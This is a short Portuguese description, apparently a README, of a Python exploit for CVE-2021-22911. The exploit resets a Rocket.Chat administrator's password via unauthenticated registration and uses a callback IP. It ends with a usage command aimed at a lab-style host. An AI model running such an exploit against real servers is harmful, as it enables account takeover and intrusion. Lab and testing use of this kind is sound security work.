
Script de exploit em Python para CVE-2021-22911 visando redefinição de senha de administrador do Rocket.Chat via registro de usuário não autenticado. Automatiza a exploração com alvo configurável, nome de usuário de administrador e IP de callback.
Se você já registrou um usuário, isso apenas redefinirá a senha do administrador, e não ambas. Fazendo o exploit rodar muito mais rápido.
python3 exploit.py -u test -a [email protected] -t http://chat.rocket.thm -i 10.10.4.24 -p 80